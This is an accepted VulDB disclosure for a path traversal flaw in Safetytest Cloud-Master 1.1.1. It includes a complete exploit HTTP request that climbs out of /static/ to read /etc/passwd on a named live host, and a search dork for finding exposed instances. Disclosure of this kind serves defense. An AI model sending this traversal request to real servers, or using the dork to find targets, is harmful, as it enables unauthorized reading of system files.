| Title | Safetytest Cloud-Master 1.1.1 Path Traversal: 'dir/../../filename' |
|---|
| Description | Cloud-Master v1.1.1 technology hosted at https://example.com/ (for example) has been identified as vulnerable to Path Traversal attacks. This vulnerability allows an attacker to access sensitive files and directories on the server, outside the root directory of the web application. Through crafted requests, an attacker can exploit this flaw to access critical files, such as /etc/passwd, which contains information about the system users.
Vulnerable Endpoint:
GET /static/
Exploitative Request:
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: vmd115546.contaboserver.net
Connection: Keep-alive
The above request successfully returned the contents of the /etc/passwd file, confirming the vulnerability.
Vendor:
https://safetytest.atlassian.net/wiki/spaces/RMA/overview
Dork:
title="Cloud Master" |
|---|
| User | Eduardo Maragno (UID 80876) |
|---|
| Submission | 01/28/2025 14:43 (1 Year ago) |
|---|
| Moderation | 02/06/2025 15:41 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 294862 [Safetytest Cloud-Master Server up to 1.1.1 /static/ path traversal] |
|---|
| Points | 17 |
|---|